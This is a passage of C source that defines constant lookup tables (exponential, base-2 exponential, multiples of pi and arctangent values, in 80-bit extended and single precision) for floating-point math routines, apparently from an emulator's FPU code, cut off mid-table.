make_floatx80_init(0x3FFE, 0xD3680D3680D3680D), make_floatx80_init(0x3FFC, 0xC3FD032906488481), make_floatx80_init(0x3FFE, 0xD0B69FCBD2580D0B), make_floatx80_init(0x3FFC, 0xD11DE0FF15AB18CA), make_floatx80_init(0x3FFE, 0xCE168A7725080CE1), make_floatx80_init(0x3FFC, 0xDE1433A16C66B150), make_floatx80_init(0x3FFE, 0xCB8727C065C393E0), make_floatx80_init(0x3FFC, 0xEAE10B5A7DDC8ADD), make_floatx80_init(0x3FFE, 0xC907DA4E871146AD), make_floatx80_init(0x3FFC, 0xF7856E5EE2C9B291), make_floatx80_init(0x3FFE, 0xC6980C6980C6980C), make_floatx80_init(0x3FFD, 0x82012CA5A68206D7), make_floatx80_init(0x3FFE, 0xC4372F855D824CA6), make_floatx80_init(0x3FFD, 0x882C5FCD7256A8C5), make_floatx80_init(0x3FFE, 0xC1E4BBD595F6E947), make_floatx80_init(0x3FFD, 0x8E44C60B4CCFD7DE), make_floatx80_init(0x3FFE, 0xBFA02FE80BFA02FF), make_floatx80_init(0x3FFD, 0x944AD09EF4351AF6), make_floatx80_init(0x3FFE, 0xBD69104707661AA3), make_floatx80_init(0x3FFD, 0x9A3EECD4C3EAA6B2), make_floatx80_init(0x3FFE, 0xBB3EE721A54D880C), make_floatx80_init(0x3FFD, 0xA0218434353F1DE8), make_floatx80_init(0x3FFE, 0xB92143FA36F5E02E), make_floatx80_init(0x3FFD, 0xA5F2FCABBBC506DA), make_floatx80_init(0x3FFE, 0xB70FBB5A19BE3659), make_floatx80_init(0x3FFD, 0xABB3B8BA2AD362A5), make_floatx80_init(0x3FFE, 0xB509E68A9B94821F), make_floatx80_init(0x3FFD, 0xB1641795CE3CA97B), make_floatx80_init(0x3FFE, 0xB30F63528917C80B), make_floatx80_init(0x3FFD, 0xB70475515D0F1C61), make_floatx80_init(0x3FFE, 0xB11FD3B80B11FD3C), make_floatx80_init(0x3FFD, 0xBC952AFEEA3D13E1), make_floatx80_init(0x3FFE, 0xAF3ADDC680AF3ADE), make_floatx80_init(0x3FFD, 0xC2168ED0F458BA4A), make_floatx80_init(0x3FFE, 0xAD602B580AD602B6), make_floatx80_init(0x3FFD, 0xC788F439B3163BF1), make_floatx80_init(0x3FFE, 0xAB8F69E28359CD11), make_floatx80_init(0x3FFD, 0xCCECAC08BF04565D), make_floatx80_init(0x3FFE, 0xA9C84A47A07F5638), make_floatx80_init(0x3FFD, 0xD24204872DD85160), make_floatx80_init(0x3FFE, 0xA80A80A80A80A80B), make_floatx80_init(0x3FFD, 0xD78949923BC3588A), make_floatx80_init(0x3FFE, 0xA655C4392D7B73A8), make_floatx80_init(0x3FFD, 0xDCC2C4B49887DACC), make_floatx80_init(0x3FFE, 0xA4A9CF1D96833751), make_floatx80_init(0x3FFD, 0xE1EEBD3E6D6A6B9E), make_floatx80_init(0x3FFE, 0xA3065E3FAE7CD0E0), make_floatx80_init(0x3FFD, 0xE70D785C2F9F5BDC), make_floatx80_init(0x3FFE, 0xA16B312EA8FC377D), make_floatx80_init(0x3FFD, 0xEC1F392C5179F283), make_floatx80_init(0x3FFE, 0x9FD809FD809FD80A), make_floatx80_init(0x3FFD, 0xF12440D3E36130E6), make_floatx80_init(0x3FFE, 0x9E4CAD23DD5F3A20), make_floatx80_init(0x3FFD, 0xF61CCE92346600BB), make_floatx80_init(0x3FFE, 0x9CC8E160C3FB19B9), make_floatx80_init(0x3FFD, 0xFB091FD38145630A), make_floatx80_init(0x3FFE, 0x9B4C6F9EF03A3CAA), make_floatx80_init(0x3FFD, 0xFFE97042BFA4C2AD), make_floatx80_init(0x3FFE, 0x99D722DABDE58F06), make_floatx80_init(0x3FFE, 0x825EFCED49369330), make_floatx80_init(0x3FFE, 0x9868C809868C8098), make_floatx80_init(0x3FFE, 0x84C37A7AB9A905C9), make_floatx80_init(0x3FFE, 0x97012E025C04B809), make_floatx80_init(0x3FFE, 0x87224C2E8E645FB7), make_floatx80_init(0x3FFE, 0x95A02568095A0257), make_floatx80_init(0x3FFE, 0x897B8CAC9F7DE298), make_floatx80_init(0x3FFE, 0x9445809445809446), make_floatx80_init(0x3FFE, 0x8BCF55DEC4CD05FE), make_floatx80_init(0x3FFE, 0x92F113840497889C), make_floatx80_init(0x3FFE, 0x8E1DC0FB89E125E5), make_floatx80_init(0x3FFE, 0x91A2B3C4D5E6F809), make_floatx80_init(0x3FFE, 0x9066E68C955B6C9B), make_floatx80_init(0x3FFE, 0x905A38633E06C43B), make_floatx80_init(0x3FFE, 0x92AADE74C7BE59E0), make_floatx80_init(0x3FFE, 0x8F1779D9FDC3A219), make_floatx80_init(0x3FFE, 0x94E9BFF615845643), make_floatx80_init(0x3FFE, 0x8DDA520237694809), make_floatx80_init(0x3FFE, 0x9723A1B720134203), make_floatx80_init(0x3FFE, 0x8CA29C046514E023), make_floatx80_init(0x3FFE, 0x995899C890EB8990), make_floatx80_init(0x3FFE, 0x8B70344A139BC75A), make_floatx80_init(0x3FFE, 0x9B88BDAA3A3DAE2F), make_floatx80_init(0x3FFE, 0x8A42F8705669DB46), make_floatx80_init(0x3FFE, 0x9DB4224FFFE1157C), make_floatx80_init(0x3FFE, 0x891AC73AE9819B50), make_floatx80_init(0x3FFE, 0x9FDADC268B7A12DA), make_floatx80_init(0x3FFE, 0x87F78087F78087F8), make_floatx80_init(0x3FFE, 0xA1FCFF17CE733BD4), make_floatx80_init(0x3FFE, 0x86D905447A34ACC6), make_floatx80_init(0x3FFE, 0xA41A9E8F5446FB9F), make_floatx80_init(0x3FFE, 0x85BF37612CEE3C9B), make_floatx80_init(0x3FFE, 0xA633CD7E6771CD8B), make_floatx80_init(0x3FFE, 0x84A9F9C8084A9F9D), make_floatx80_init(0x3FFE, 0xA8489E600B435A5E), make_floatx80_init(0x3FFE, 0x839930523FBE3368), make_floatx80_init(0x3FFE, 0xAA59233CCCA4BD49), make_floatx80_init(0x3FFE, 0x828CBFBEB9A020A3), make_floatx80_init(0x3FFE, 0xAC656DAE6BCC4985), make_floatx80_init(0x3FFE, 0x81848DA8FAF0D277), make_floatx80_init(0x3FFE, 0xAE6D8EE360BB2468), make_floatx80_init(0x3FFE, 0x8080808080808081), make_floatx80_init(0x3FFE, 0xB07197A23C46C654) }; static const floatx80 exp_tbl[64] = { make_floatx80_init(0x3FFF, 0x8000000000000000), make_floatx80_init(0x3FFF, 0x8164D1F3BC030774), make_floatx80_init(0x3FFF, 0x82CD8698AC2BA1D8), make_floatx80_init(0x3FFF, 0x843A28C3ACDE4048), make_floatx80_init(0x3FFF, 0x85AAC367CC487B14), make_floatx80_init(0x3FFF, 0x871F61969E8D1010), make_floatx80_init(0x3FFF, 0x88980E8092DA8528), make_floatx80_init(0x3FFF, 0x8A14D575496EFD9C), make_floatx80_init(0x3FFF, 0x8B95C1E3EA8BD6E8), make_floatx80_init(0x3FFF, 0x8D1ADF5B7E5BA9E4), make_floatx80_init(0x3FFF, 0x8EA4398B45CD53C0), make_floatx80_init(0x3FFF, 0x9031DC431466B1DC), make_floatx80_init(0x3FFF, 0x91C3D373AB11C338), make_floatx80_init(0x3FFF, 0x935A2B2F13E6E92C), make_floatx80_init(0x3FFF, 0x94F4EFA8FEF70960), make_floatx80_init(0x3FFF, 0x96942D3720185A00), make_floatx80_init(0x3FFF, 0x9837F0518DB8A970), make_floatx80_init(0x3FFF, 0x99E0459320B7FA64), make_floatx80_init(0x3FFF, 0x9B8D39B9D54E5538), make_floatx80_init(0x3FFF, 0x9D3ED9A72CFFB750), make_floatx80_init(0x3FFF, 0x9EF5326091A111AC), make_floatx80_init(0x3FFF, 0xA0B0510FB9714FC4), make_floatx80_init(0x3FFF, 0xA27043030C496818), make_floatx80_init(0x3FFF, 0xA43515AE09E680A0), make_floatx80_init(0x3FFF, 0xA5FED6A9B15138EC), make_floatx80_init(0x3FFF, 0xA7CD93B4E9653568), make_floatx80_init(0x3FFF, 0xA9A15AB4EA7C0EF8), make_floatx80_init(0x3FFF, 0xAB7A39B5A93ED338), make_floatx80_init(0x3FFF, 0xAD583EEA42A14AC8), make_floatx80_init(0x3FFF, 0xAF3B78AD690A4374), make_floatx80_init(0x3FFF, 0xB123F581D2AC2590), make_floatx80_init(0x3FFF, 0xB311C412A9112488), make_floatx80_init(0x3FFF, 0xB504F333F9DE6484), make_floatx80_init(0x3FFF, 0xB6FD91E328D17790), make_floatx80_init(0x3FFF, 0xB8FBAF4762FB9EE8), make_floatx80_init(0x3FFF, 0xBAFF5AB2133E45FC), make_floatx80_init(0x3FFF, 0xBD08A39F580C36C0), make_floatx80_init(0x3FFF, 0xBF1799B67A731084), make_floatx80_init(0x3FFF, 0xC12C4CCA66709458), make_floatx80_init(0x3FFF, 0xC346CCDA24976408), make_floatx80_init(0x3FFF, 0xC5672A115506DADC), make_floatx80_init(0x3FFF, 0xC78D74C8ABB9B15C), make_floatx80_init(0x3FFF, 0xC9B9BD866E2F27A4), make_floatx80_init(0x3FFF, 0xCBEC14FEF2727C5C), make_floatx80_init(0x3FFF, 0xCE248C151F8480E4), make_floatx80_init(0x3FFF, 0xD06333DAEF2B2594), make_floatx80_init(0x3FFF, 0xD2A81D91F12AE45C), make_floatx80_init(0x3FFF, 0xD4F35AABCFEDFA20), make_floatx80_init(0x3FFF, 0xD744FCCAD69D6AF4), make_floatx80_init(0x3FFF, 0xD99D15C278AFD7B4), make_floatx80_init(0x3FFF, 0xDBFBB797DAF23754), make_floatx80_init(0x3FFF, 0xDE60F4825E0E9124), make_floatx80_init(0x3FFF, 0xE0CCDEEC2A94E110), make_floatx80_init(0x3FFF, 0xE33F8972BE8A5A50), make_floatx80_init(0x3FFF, 0xE5B906E77C8348A8), make_floatx80_init(0x3FFF, 0xE8396A503C4BDC68), make_floatx80_init(0x3FFF, 0xEAC0C6E7DD243930), make_floatx80_init(0x3FFF, 0xED4F301ED9942B84), make_floatx80_init(0x3FFF, 0xEFE4B99BDCDAF5CC), make_floatx80_init(0x3FFF, 0xF281773C59FFB138), make_floatx80_init(0x3FFF, 0xF5257D152486CC2C), make_floatx80_init(0x3FFF, 0xF7D0DF730AD13BB8), make_floatx80_init(0x3FFF, 0xFA83B2DB722A033C), make_floatx80_init(0x3FFF, 0xFD3E0C0CF486C174) }; static const float32 exp_tbl2[64] = { const_float32(0x00000000), const_float32(0x9F841A9B), const_float32(0x9FC1D5B9), const_float32(0xA0728369), const_float32(0x1FC5C95C), const_float32(0x1EE85C9F), const_float32(0x9FA20729), const_float32(0xA07BF9AF), const_float32(0xA0020DCF), const_float32(0x205A63DA), const_float32(0x1EB70051), const_float32(0x1F6EB029), const_float32(0xA0781494), const_float32(0x9EB319B0), const_float32(0x2017457D), const_float32(0x1F11D537), const_float32(0x9FB952DD), const_float32(0x1FE43087), const_float32(0x1FA2A818), const_float32(0x1FDE494D), const_float32(0x20504890), const_float32(0xA073691C), const_float32(0x1F9B7A05), const_float32(0xA0797126), const_float32(0xA071A140), const_float32(0x204F62DA), const_float32(0x1F283C4A), const_float32(0x9F9A7FDC), const_float32(0xA05B3FAC), const_float32(0x1FDF2610), const_float32(0x9F705F90), const_float32(0x201F678A), const_float32(0x1F32FB13), const_float32(0x20038B30), const_float32(0x200DC3CC), const_float32(0x9F8B2AE6), const_float32(0xA02BBF70), const_float32(0xA00BF518), const_float32(0xA041DD41), const_float32(0x9FDF137B), const_float32(0x201F1568), const_float32(0x1FC13A2E), const_float32(0xA03F8F03), const_float32(0x1FF4907D), const_float32(0x9E6E53E4), const_float32(0x1FD6D45C), const_float32(0xA076EDB9), const_float32(0x9FA6DE21), const_float32(0x1EE69A2F), const_float32(0x207F439F), const_float32(0x201EC207), const_float32(0x9E8BE175), const_float32(0x20032C4B), const_float32(0x2004DFF5), const_float32(0x1E72F47A), const_float32(0x1F722F22), const_float32(0xA017E945), const_float32(0x1F401A5B), const_float32(0x9FB9A9E3), const_float32(0x20744C05), const_float32(0x1F773A19), const_float32(0x1FFE90D5), const_float32(0xA041ED22), const_float32(0x1F853F3A), }; static const floatx80 exp2_tbl[64] = { make_floatx80_init(0x3FFF, 0x8000000000000000), make_floatx80_init(0x3FFF, 0x8164D1F3BC030773), make_floatx80_init(0x3FFF, 0x82CD8698AC2BA1D7), make_floatx80_init(0x3FFF, 0x843A28C3ACDE4046), make_floatx80_init(0x3FFF, 0x85AAC367CC487B15), make_floatx80_init(0x3FFF, 0x871F61969E8D1010), make_floatx80_init(0x3FFF, 0x88980E8092DA8527), make_floatx80_init(0x3FFF, 0x8A14D575496EFD9A), make_floatx80_init(0x3FFF, 0x8B95C1E3EA8BD6E7), make_floatx80_init(0x3FFF, 0x8D1ADF5B7E5BA9E6), make_floatx80_init(0x3FFF, 0x8EA4398B45CD53C0), make_floatx80_init(0x3FFF, 0x9031DC431466B1DC), make_floatx80_init(0x3FFF, 0x91C3D373AB11C336), make_floatx80_init(0x3FFF, 0x935A2B2F13E6E92C), make_floatx80_init(0x3FFF, 0x94F4EFA8FEF70961), make_floatx80_init(0x3FFF, 0x96942D3720185A00), make_floatx80_init(0x3FFF, 0x9837F0518DB8A96F), make_floatx80_init(0x3FFF, 0x99E0459320B7FA65), make_floatx80_init(0x3FFF, 0x9B8D39B9D54E5539), make_floatx80_init(0x3FFF, 0x9D3ED9A72CFFB751), make_floatx80_init(0x3FFF, 0x9EF5326091A111AE), make_floatx80_init(0x3FFF, 0xA0B0510FB9714FC2), make_floatx80_init(0x3FFF, 0xA27043030C496819), make_floatx80_init(0x3FFF, 0xA43515AE09E6809E), make_floatx80_init(0x3FFF, 0xA5FED6A9B15138EA), make_floatx80_init(0x3FFF, 0xA7CD93B4E965356A), make_floatx80_init(0x3FFF, 0xA9A15AB4EA7C0EF8), make_floatx80_init(0x3FFF, 0xAB7A39B5A93ED337), make_floatx80_init(0x3FFF, 0xAD583EEA42A14AC6), make_floatx80_init(0x3FFF, 0xAF3B78AD690A4375), make_floatx80_init(0x3FFF, 0xB123F581D2AC2590), make_floatx80_init(0x3FFF, 0xB311C412A9112489), make_floatx80_init(0x3FFF, 0xB504F333F9DE6484), make_floatx80_init(0x3FFF, 0xB6FD91E328D17791), make_floatx80_init(0x3FFF, 0xB8FBAF4762FB9EE9), make_floatx80_init(0x3FFF, 0xBAFF5AB2133E45FB), make_floatx80_init(0x3FFF, 0xBD08A39F580C36BF), make_floatx80_init(0x3FFF, 0xBF1799B67A731083), make_floatx80_init(0x3FFF, 0xC12C4CCA66709456), make_floatx80_init(0x3FFF, 0xC346CCDA24976407), make_floatx80_init(0x3FFF, 0xC5672A115506DADD), make_floatx80_init(0x3FFF, 0xC78D74C8ABB9B15D), make_floatx80_init(0x3FFF, 0xC9B9BD866E2F27A3), make_floatx80_init(0x3FFF, 0xCBEC14FEF2727C5D), make_floatx80_init(0x3FFF, 0xCE248C151F8480E4), make_floatx80_init(0x3FFF, 0xD06333DAEF2B2595), make_floatx80_init(0x3FFF, 0xD2A81D91F12AE45A), make_floatx80_init(0x3FFF, 0xD4F35AABCFEDFA1F), make_floatx80_init(0x3FFF, 0xD744FCCAD69D6AF4), make_floatx80_init(0x3FFF, 0xD99D15C278AFD7B6), make_floatx80_init(0x3FFF, 0xDBFBB797DAF23755), make_floatx80_init(0x3FFF, 0xDE60F4825E0E9124), make_floatx80_init(0x3FFF, 0xE0CCDEEC2A94E111), make_floatx80_init(0x3FFF, 0xE33F8972BE8A5A51), make_floatx80_init(0x3FFF, 0xE5B906E77C8348A8), make_floatx80_init(0x3FFF, 0xE8396A503C4BDC68), make_floatx80_init(0x3FFF, 0xEAC0C6E7DD24392F), make_floatx80_init(0x3FFF, 0xED4F301ED9942B84), make_floatx80_init(0x3FFF, 0xEFE4B99BDCDAF5CB), make_floatx80_init(0x3FFF, 0xF281773C59FFB13A), make_floatx80_init(0x3FFF, 0xF5257D152486CC2C), make_floatx80_init(0x3FFF, 0xF7D0DF730AD13BB9), make_floatx80_init(0x3FFF, 0xFA83B2DB722A033A), make_floatx80_init(0x3FFF, 0xFD3E0C0CF486C175) }; static const uint32_t exp2_tbl2[64] = { 0x3F738000, 0x3FBEF7CA, 0x3FBDF8A9, 0x3FBCD7C9, 0xBFBDE8DA, 0x3FBDE85C, 0x3FBEBBF1, 0x3FBB80CA, 0xBFBA8373, 0xBFBE9670, 0x3FBDB700, 0x3FBEEEB0, 0x3FBBFD6D, 0xBFBDB319, 0x3FBDBA2B, 0x3FBE91D5, 0x3FBE8D5A, 0xBFBCDE7B, 0xBFBEBAAF, 0xBFBD86DA, 0xBFBEBEDD, 0x3FBCC96E, 0xBFBEC90B, 0x3FBBD1DB, 0x3FBCE5EB, 0xBFBEC274, 0x3FBEA83C, 0x3FBECB00, 0x3FBE9301, 0xBFBD8367, 0xBFBEF05F, 0x3FBDFB3C, 0x3FBEB2FB, 0x3FBAE2CB, 0x3FBCDC3C, 0x3FBEE9AA, 0xBFBEAEFD, 0xBFBCBF51, 0x3FBEF88A, 0x3FBD83B2, 0x3FBDF8AB, 0xBFBDFB17, 0xBFBEFE3C, 0xBFBBB6F8, 0xBFBCEE53, 0xBFBDA4AE, 0x3FBC9124, 0x3FBEB243, 0x3FBDE69A, 0xBFB8BC61, 0x3FBDF610, 0xBFBD8BE1, 0x3FBACB12, 0x3FBB9BFE, 0x3FBCF2F4, 0x3FBEF22F, 0xBFBDBF4A, 0x3FBEC01A, 0x3FBE8CAC, 0xBFBCBB3F, 0x3FBEF73A, 0xBFB8B795, 0x3FBEF84B, 0xBFBEF581 }; static const floatx80 pi_tbl[65] = { make_floatx80_init(0xC004, 0xC90FDAA22168C235), make_floatx80_init(0xC004, 0xC2C75BCD105D7C23), make_floatx80_init(0xC004, 0xBC7EDCF7FF523611), make_floatx80_init(0xC004, 0xB6365E22EE46F000), make_floatx80_init(0xC004, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0xC004, 0xA9A56078CC3063DD), make_floatx80_init(0xC004, 0xA35CE1A3BB251DCB), make_floatx80_init(0xC004, 0x9D1462CEAA19D7B9), make_floatx80_init(0xC004, 0x96CBE3F9990E91A8), make_floatx80_init(0xC004, 0x9083652488034B96), make_floatx80_init(0xC004, 0x8A3AE64F76F80584), make_floatx80_init(0xC004, 0x83F2677A65ECBF73), make_floatx80_init(0xC003, 0xFB53D14AA9C2F2C2), make_floatx80_init(0xC003, 0xEEC2D3A087AC669F), make_floatx80_init(0xC003, 0xE231D5F66595DA7B), make_floatx80_init(0xC003, 0xD5A0D84C437F4E58), make_floatx80_init(0xC003, 0xC90FDAA22168C235), make_floatx80_init(0xC003, 0xBC7EDCF7FF523611), make_floatx80_init(0xC003, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0xC003, 0xA35CE1A3BB251DCB), make_floatx80_init(0xC003, 0x96CBE3F9990E91A8), make_floatx80_init(0xC003, 0x8A3AE64F76F80584), make_floatx80_init(0xC002, 0xFB53D14AA9C2F2C2), make_floatx80_init(0xC002, 0xE231D5F66595DA7B), make_floatx80_init(0xC002, 0xC90FDAA22168C235), make_floatx80_init(0xC002, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0xC002, 0x96CBE3F9990E91A8), make_floatx80_init(0xC001, 0xFB53D14AA9C2F2C2), make_floatx80_init(0xC001, 0xC90FDAA22168C235), make_floatx80_init(0xC001, 0x96CBE3F9990E91A8), make_floatx80_init(0xC000, 0xC90FDAA22168C235), make_floatx80_init(0xBFFF, 0xC90FDAA22168C235), make_floatx80_init(0x0000, 0x0000000000000000), make_floatx80_init(0x3FFF, 0xC90FDAA22168C235), make_floatx80_init(0x4000, 0xC90FDAA22168C235), make_floatx80_init(0x4001, 0x96CBE3F9990E91A8), make_floatx80_init(0x4001, 0xC90FDAA22168C235), make_floatx80_init(0x4001, 0xFB53D14AA9C2F2C2), make_floatx80_init(0x4002, 0x96CBE3F9990E91A8), make_floatx80_init(0x4002, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0x4002, 0xC90FDAA22168C235), make_floatx80_init(0x4002, 0xE231D5F66595DA7B), make_floatx80_init(0x4002, 0xFB53D14AA9C2F2C2), make_floatx80_init(0x4003, 0x8A3AE64F76F80584), make_floatx80_init(0x4003, 0x96CBE3F9990E91A8), make_floatx80_init(0x4003, 0xA35CE1A3BB251DCB), make_floatx80_init(0x4003, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0x4003, 0xBC7EDCF7FF523611), make_floatx80_init(0x4003, 0xC90FDAA22168C235), make_floatx80_init(0x4003, 0xD5A0D84C437F4E58), make_floatx80_init(0x4003, 0xE231D5F66595DA7B), make_floatx80_init(0x4003, 0xEEC2D3A087AC669F), make_floatx80_init(0x4003, 0xFB53D14AA9C2F2C2), make_floatx80_init(0x4004, 0x83F2677A65ECBF73), make_floatx80_init(0x4004, 0x8A3AE64F76F80584), make_floatx80_init(0x4004, 0x9083652488034B96), make_floatx80_init(0x4004, 0x96CBE3F9990E91A8), make_floatx80_init(0x4004, 0x9D1462CEAA19D7B9), make_floatx80_init(0x4004, 0xA35CE1A3BB251DCB), make_floatx80_init(0x4004, 0xA9A56078CC3063DD), make_floatx80_init(0x4004, 0xAFEDDF4DDD3BA9EE), make_floatx80_init(0x4004, 0xB6365E22EE46F000), make_floatx80_init(0x4004, 0xBC7EDCF7FF523611), make_floatx80_init(0x4004, 0xC2C75BCD105D7C23), make_floatx80_init(0x4004, 0xC90FDAA22168C235) }; static const float32 pi_tbl2[65] = { const_float32(0x21800000), const_float32(0xA0D00000), const_float32(0xA1E80000), const_float32(0x21480000), const_float32(0xA1200000), const_float32(0x21FC0000), const_float32(0x21100000), const_float32(0xA1580000), const_float32(0x21E00000), const_float32(0x20B00000), const_float32(0xA1880000), const_float32(0x21C40000), const_float32(0x20000000), const_float32(0x21380000), const_float32(0xA1300000), const_float32(0x9FC00000), const_float32(0x21000000), const_float32(0xA1680000), const_float32(0xA0A00000), const_float32(0x20900000), const_float32(0x21600000), const_float32(0xA1080000), const_float32(0x1F800000), const_float32(0xA0B00000), const_float32(0x20800000), const_float32(0xA0200000), const_float32(0x20E00000), const_float32(0x1F000000), const_float32(0x20000000), const_float32(0x20600000), const_float32(0x1F800000), const_float32(0x1F000000), const_float32(0x00000000), const_float32(0x9F000000), const_float32(0x9F800000), const_float32(0xA0600000), const_float32(0xA0000000), const_float32(0x9F000000), const_float32(0xA0E00000), const_float32(0x20200000), const_float32(0xA0800000), const_float32(0x20B00000), const_float32(0x9F800000), const_float32(0x21080000), const_float32(0xA1600000), const_float32(0xA0900000), const_float32(0x20A00000), const_float32(0x21680000), const_float32(0xA1000000), const_float32(0x1FC00000), const_float32(0x21300000), const_float32(0xA1380000), const_float32(0xA0000000), const_float32(0xA1C40000), const_float32(0x21880000), const_float32(0xA0B00000), const_float32(0xA1E00000), const_float32(0x21580000), const_float32(0xA1100000), const_float32(0xA1FC0000), const_float32(0x21200000), const_float32(0xA1480000), const_float32(0x21E80000), const_float32(0x20D00000), const_float32(0xA1800000), }; static const floatx80 atan_tbl[128] = { make_floatx80_init(0x3FFB, 0x83D152C5060B7A51), make_floatx80_init(0x3FFB, 0x8BC8544565498B8B), make_floatx80_init(0x3FFB, 0x93BE406017626B0D), make_floatx80_init(0x3FFB, 0x9BB3078D35AEC202), make_floatx80_init(0x3FFB, 0xA3A69A525DDCE7DE), make_floatx80_init(0x3FFB, 0xAB98E94362765619), make_floatx80_init(0x3FFB, 0xB389E502F9C59862), make_floatx80_init(0x3FFB, 0xBB797E436B09E6FB), make_floatx80_init(0x3FFB, 0xC367A5C739E5F446), make_floatx80_init(0x3FFB, 0xCB544C61CFF7D5C6), make_floatx80_init(0x3FFB, 0xD33F62F82488533E), make_floatx80_init(0x3FFB, 0xDB28DA8162404C77), make_floatx80_init(0x3FFB, 0xE310A4078AD34F18), make_floatx80_init(0x3FFB, 0xEAF6B0A8188EE1EB), make_floatx80_init(0x3FFB, 0xF2DAF1949DBE79D5), make_floatx80_init(0x3FFB, 0xFABD581361D47E3E), make_floatx80_init(0x3FFC, 0x8346AC210959ECC4), make_floatx80_init(0x3FFC, 0x8B232A08304282D8), make_floatx80_init(0x3FFC, 0x92FB70B8D29AE2F9), make_floatx80_init(0x3FFC, 0x9ACF476F5CCD1CB4), make_floatx80_init(0x3FFC, 0xA29E76304954F23F), make_floatx80_init(0x3FFC, 0xAA68C5D08AB85230), make_floatx80_init(0x3FFC, 0xB22DFFFD9D539F83), make_floatx80_init(0x3FFC, 0xB9EDEF453E900EA5), make_floatx80_init(0x3FFC, 0xC1A85F1CC75E3EA5), make_floatx80_init(0x3FFC, 0xC95D1BE828138DE6), make_floatx80_init(0x3FFC, 0xD10BF300840D2DE4), make_floatx80_init(0x3FFC, 0xD8B4B2BA6BC05E7A), make_floatx80_init(0x3FFC, 0xE0572A6BB42335F6), make_floatx80_init(0x3FFC, 0xE7F32A70EA9CAA8F), make_floatx80_init(0x3FFC, 0xEF88843264ECEFAA), make_floatx80_init(0x3FFC, 0xF7170A28ECC06666), make_floatx80_init(0x3FFD, 0x812FD288332DAD32), make_floatx80_init(0x3FFD, 0x88A8D1B1218E4D64), make_floatx80_init(0x3FFD, 0x9012AB3F23E4AEE8), make_floatx80_init(0x3FFD, 0x976CC3D411E7F1B9), make_floatx80_init(0x3FFD, 0x9EB689493889A227), make_floatx80_init(0x3FFD, 0xA5EF72C34487361B), make_floatx80_init(0x3FFD, 0xAD1700BAF07A7227), make_floatx80_init(0x3FFD, 0xB42CBCFAFD37EFB7), make_floatx80_init(0x3FFD, 0xBB303A940BA80F89), make_floatx80_init(0x3FFD, 0xC22115C6FCAEBBAF), make_floatx80_init(0x3FFD, 0xC8FEF3E686331221), make_floatx80_init(0x3FFD, 0xCFC98330B4000C70), make_floatx80_init(0x3FFD, 0xD6807AA1102C5BF9), make_floatx80_init(0x3FFD, 0xDD2399BC31252AA3), make_floatx80_init(0x3FFD, 0xE3B2A8556B8FC517), make_floatx80_init(0x3FFD, 0xEA2D764F64315989), make_floatx80_init(0x3FFD, 0xF3BF5BF8BAD1A21D), make_floatx80_init(0x3FFE, 0x801CE39E0D205C9A), make_floatx80_init(0x3FFE, 0x8630A2DADA1ED066), make_floatx80_init(0x3FFE, 0x8C1AD445F3E09B8C), make_floatx80_init(0x3FFE, 0x91DB8F1664F350E2), make_floatx80_init(0x3FFE, 0x97731420365E538C), make_floatx80_init(0x3FFE, 0x9CE1C8E6A0B8CDBA), make_floatx80_init(0x3FFE, 0xA22832DBCADAAE09), make_floatx80_init(0x3FFE, 0xA746F2DDB7602294), make_floatx80_init(0x3FFE, 0xAC3EC0FB997DD6A2), make_floatx80_init(0x3FFE, 0xB110688AEBDC6F6A), make_floatx80_init(0x3FFE, 0xB5BCC49059ECC4B0), make_floatx80_init(0x3FFE, 0xBA44BC7DD470782F), make_floatx80_init(0x3FFE, 0xBEA94144FD049AAC), make_floatx80_init(0x3FFE, 0xC2EB4ABB661628B6), make_floatx80_init(0x3FFE, 0xC70BD54CE602EE14), make_floatx80_init(0x3FFE, 0xCD000549ADEC7159), make_floatx80_init(0x3FFE, 0xD48457D2D8EA4EA3), make_floatx80_init(0x3FFE, 0xDB948DA712DECE3B), make_floatx80_init(0x3FFE, 0xE23855F969E8096A), make_floatx80_init(0x3FFE, 0xE8771129C4353259), make_floatx80_init(0x3FFE, 0xEE57C16E0D379C0D), make_floatx80_init(0x3FFE, 0xF3E10211A87C3779), make_floatx80_init(0x3FFE, 0xF919039D758B8D41), make_floatx80_init(0x3FFE, 0xFE058B8F64935FB3), make_floatx80_init(0x3FFF, 0x8155FB497B685D04), make_floatx80_init(0x3FFF, 0x83889E3549D108E1), make_floatx80_init(0x3FFF, 0x859CFA76511D724B), make_floatx80_init(0x3FFF, 0x87952ECFFF8131E7), make_floatx80_init(0x3FFF, 0x89732FD19557641B), make_floatx80_init(0x3FFF, 0x8B38CAD101932A35), make_floatx80_init(0x3FFF, 0x8CE7A8D8301EE6B5), make_floatx80_init(0x3FFF, 0x8F46A39E2EAE5281), make_floatx80_init(0x3FFF, 0x922DA7D791888487), make_floatx80_init(0x3FFF, 0x94D19FCBDEDF5241), make_floatx80_init(0x3FFF, 0x973AB94419D2A08B), make_floatx80_init(0x3FFF, 0x996FF00E08E10B96), make_floatx80_init(0x3FFF, 0x9B773F9512321DA7), make_floatx80_init(0x3FFF, 0x9D55CC320F935624), make_floatx80_init(0x3FFF, 0x9F100575006CC571), make_floatx80_init(0x3FFF, 0xA0A9C290D97CC06C), make_floatx80_init(0x3FFF, 0xA22659EBEBC0630A), make_floatx80_init(0x3FFF, 0xA388B4AFF6EF0EC9), make_floatx80_init(0x3FFF, 0xA4D35F1061D292C4), make_floatx80_init(0x3FFF, 0xA60895DCFBE3187E), make_floatx80_init(0x3FFF, 0xA72A51DC7367BEAC), make_floatx80_init(0x3FFF, 0xA83A51530956168F), make_floatx80_init(0x3FFF, 0xA93A20077539546E), make_floatx80_init(0x3FFF, 0xAA9E7245023B2605), make_floatx80_init(0x3FFF, 0xAC4C84BA6FE4D58F), make_floatx80_init(0x3FFF, 0xADCE4A4A606B9712), make_floatx80_init(0x3FFF, 0xAF2A2DCD8D263C9C), make_floatx80_init(0x3FFF, 0xB0656F81F22265C7), make_floatx80_init(0x3FFF, 0xB18465150F71496A), make_floatx80_init(0x3FFF, 0xB28AAA156F9ADA35), make_floatx80_init(0x3FFF, 0xB37B44FF3766B895), make_floatx80_init(0x3FFF, 0xB458C3DCE9630433), make_floatx80_init(0x3FFF, 0xB525529D562246BD), make_floatx80_init(0x3FFF, 0xB5E2CCA95F9D88CC), make_floatx80_init(0x3FFF, 0xB692CADA7ACA1ADA), make_floatx80_init(0x3FFF, 0xB736AEA7A6925838), make_floatx80_init(0x3FFF, 